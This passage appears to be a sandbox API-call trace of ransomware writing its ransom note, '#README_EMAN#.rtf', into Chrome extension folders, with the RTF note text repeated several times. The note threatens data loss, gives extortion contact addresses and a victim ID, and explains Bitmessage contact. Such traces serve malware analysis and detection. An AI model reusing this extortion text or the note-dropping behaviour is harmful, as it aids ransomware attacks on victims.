ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.126] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.127] CloseHandle (hObject=0x294) returned 1 [0285.127] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\#readme_eman#.rtf")) returned 0x20 [0285.127] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\#readme_eman#.rtf")) returned 0xffffffff [0285.127] GetLastError () returned 0x2 [0285.127] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.127] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.128] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.128] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 